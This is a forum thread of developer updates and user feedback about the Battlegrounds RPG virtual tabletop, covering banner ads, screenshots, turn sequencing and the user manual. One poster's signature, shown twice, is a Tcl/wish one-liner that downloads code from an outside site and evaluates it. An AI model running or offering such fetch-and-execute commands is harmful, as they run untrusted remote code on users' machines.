Latest Site Updates

Other Battlegrounds Games news
heruca
Developer

Post by heruca » Fri Dec 02, 2005 6:48 am

Added a promotional picture to the home page. Special thanks to Kepli for his excellent Dundjinni-made map.

Note that the pic was composited in Photoshop, and is not a direct BRPG screen capture, although it does use some of the interface's visuals: namely the hexbases, hexgrid, and the glowing color-coded halos, which indicate each figure's relative health level.
:arrow: Please help spread the word about BRPG and BGE, and never hesitate to tell me how I can make them better suit your gaming needs.

heruca
Developer

Post by heruca » Mon Dec 05, 2005 7:01 pm

Hmmm. It seems that Fluid isn't too happy with my tongue-in-cheek banner ad that imitates their own Dundjinni banner ad (they seem to think it implies their endorsement, or that the products are somehow associated), so I'm going to be changing it very soon.

Does anyone have any good ideas for a new banner ad? I'm thinking of something that highlights a few of BRPG's key features, preferably in a graphical manner (like fog of war reveals).
:arrow: Please help spread the word about BRPG and BGE, and never hesitate to tell me how I can make them better suit your gaming needs.

dDemonicAngels
Soldier

Post by dDemonicAngels » Tue Dec 06, 2005 12:09 am

The fog of war has got to be the biggest draw. How about showing a dimly lit room and the characters as they enter with their different light sources. Then some dice rolls across the screen and shows...? (What else is the biggest draw?)

PS I didn't pick up on the DJ connection, but I now see there point. Especially since the DJ link is mentioned on the site. Good luck.

heruca
Developer

Post by heruca » Tue Dec 06, 2005 12:37 am

I'd love to do that, but have you seen how small these banners are? LOL!

I'm very tempted to make a QuickTime movie showing exactly what you describe, though, and just post that it on the Screenshots page. But I'll still need a compelling banner ad to draw people to the site in the first place.

Halebop

Post by Halebop » Tue Dec 06, 2005 2:07 am

To me the big messages (benefits) are probably:

Fog of War (and Variable FoW ranges)
Area of Effect
Multimedia
Generic
Easy Interface / Simple Setup
Dice Roller (While a no brainer, it's obviously needed for most systems and it's also never worth assuming!)
Document Support (PDF or whatever it ends up being...)

Maybe morph the changes a little slower than the current banner that demonstrates Fog of War in action with some sort of AoE thrown in to boot? Perhaps a simple light spell that then changes the light radius? Given that people can take visuals literally you might want to demonstrate that it supports bopth Hexes and Grids by displaying screenshots of both?

heruca
Developer

Post by heruca » Thu Dec 08, 2005 11:01 am

New banner ad posted, to replace the first one. It's at the bottom of the "Links & Resources" page, in case you want to take a look.

It's not ideal, but I was able to get it made quickly with existing artwork, which is important, because right now I need to focus on coding and not making banner ads.

siege
Sergeant

Post by siege » Thu Dec 08, 2005 12:43 pm

I like the new ad. It does run a little long, but it's perfectly functional. Can't see why anyone else might have an issue with it.
echo catch "[join [list {package r http} {eval [http::data [http::geturl siege.us]]}] {; }]" | wish

heruca
Developer

Post by heruca » Thu Dec 08, 2005 12:55 pm

Yeah, I realize it's a bit on the long side.

The only ones that might have an issue with it now are the competition. :)

Halebop

Post by Halebop » Thu Dec 08, 2005 5:10 pm

Looks good to me!

siege
Sergeant

Post by siege » Thu Dec 08, 2005 7:14 pm

heruca wrote:The only ones that might have an issue with it now are the competition. :)
Harsh... but probably true.
echo catch "[join [list {package r http} {eval [http::data [http::geturl siege.us]]}] {; }]" | wish

heruca
Developer

Post by heruca » Sun Dec 18, 2005 6:31 pm

Posted two new screenshots, showing BRPG being used with different styles of maps and tokens.

http://www.battlegroundsgames.com/screenshots.html

Note that in screenshot #8, there is a beam-shaped Area of Effect overlay originating from the mage, who has just cast a spell. BRPG's AoE overlays are available in black (for use on light maps) and white (for use on dark maps). Eventually, colored overlays will also be made available, perhaps even with graphical effects on them (like a fireball blast, a frost cone, etc.).

Halebop

Post by Halebop » Sun Dec 18, 2005 7:32 pm

Looks good! And spell FXs like Fireballs sound great too!

heruca
Developer

Post by heruca » Sat Jan 21, 2006 5:11 pm

I've updated the User Interface screenshots, on the second Screenshots page.

Note the all-new screenshot (#18 ) showing the Turn Sequence panel.

Mind Flayer Monk
Sergeant

Post by Mind Flayer Monk » Sat Jan 21, 2006 6:49 pm

*claps*
looks great
--I must feed

Kepli
High Commander

Post by Kepli » Sun Jan 22, 2006 8:52 am

Simple but effective ... :shock:

heruca
Developer

Post by heruca » Sun Jan 22, 2006 3:16 pm

This should suffice for sequencing in most RPGs.

Eventually, I hope to add sequencing support for games that require characters to act in multiple phases within one game turn. For now, such games can probably be played by treating each turn as a phase, and simply skipping those characters that don't get to act in that particular phase (by referring to a printed movement phase chart) by "stepping" the sequence.

heruca
Developer

Post by heruca » Wed Feb 08, 2006 7:29 pm

Added five more sites to the "Links & Resources" page on the main site. I also fixed all the links on that page so that they open in a new window.

The new additions are:
Four Ugly Monsters
Gametable
Tabletop Mapper
MapMaker
D20Map

Man, this VT market is sure getting crowded! A fella could get confused by all the choices out there. Anyone feel like making a feature comparison chart? :D

Gwindel
Captain

Post by Gwindel » Wed Feb 08, 2006 7:44 pm

To be complete, sequencing should also cover games where characters have to spend points to act. So each time a character spend points, his place in the sequence is changed. It was used in some older games, but I am not sure it is still used in recent rules.
More people are driven insane through religious hysteria than by drinking alcohol. — W. C. Fields

heruca
Developer

Post by heruca » Tue Feb 14, 2006 6:56 am

I've posted the revised BRPG User Manual for beta 1.0.4 on the Downloads page. It now includes screenshots (from both the Windows and Mac versions), illustrations, and covers all the new features added since beta 1.0.0. Some of the older material has been revised, as well, so it might be worth re-reading it. Enjoy!

If I could get some feedback on the manual, that'd be great. A common criticism of VT software is that the documentation is extremely poor. I want to avoid that fate for BRPG. Help me out.

PS: Happy Valentine's Day, everyone!

heruca
Developer

For registered forum users only

Post by heruca » Fri Mar 03, 2006 8:23 pm

A while back, I promised to make content available exclusively to registered forum users. Well, the first of hopefully many such content packs is now posted, in the "User Creations" section of the forum, under "Genre Independent Submissions". It's a good one, so go get it!

heruca
Developer

For registered forum users only

Post by heruca » Sat Apr 15, 2006 4:33 pm

New free content has been posted that is available exclusively to registered forum users. This time, it's a map pack, and it's available in the "User Creations" section of the forum, under "Genre Independent Submissions".

Enjoy!

heruca
Developer

Post by heruca » Wed Apr 19, 2006 4:31 pm

Added a link to Turn Watcher, a new software utility for GMs, to the Links & Resources page. Looks like it might be very useful for using in combination with BRPG.

Renocide
Cannon Fodder

Post by Renocide » Wed Apr 19, 2006 9:19 pm

Turn watcher does look intersting. The only issue I had with it is it's cost/use factor and that it roles for every character that is listed in the combat. I'm sure you could manually enter the initiative for the PCs after you get their roles but it would be nice if you could just designate the NPCs vs. the PCs and have it just roll for the NPCs listed.

The price, at 25 bones, seems pretty steep to me for simply tracking initiative and whos turn it is.

heruca
Developer

Post by heruca » Thu Apr 20, 2006 12:37 am

$25? I believe it's $15 with a year of free updates, and $10 without the updates. Still pricy for what it does, IMO.

heruca
Developer

Links & Resources page updated

Post by heruca » Tue Jul 04, 2006 4:14 pm

Added seven more sites to the "Links & Resources" page on the main site.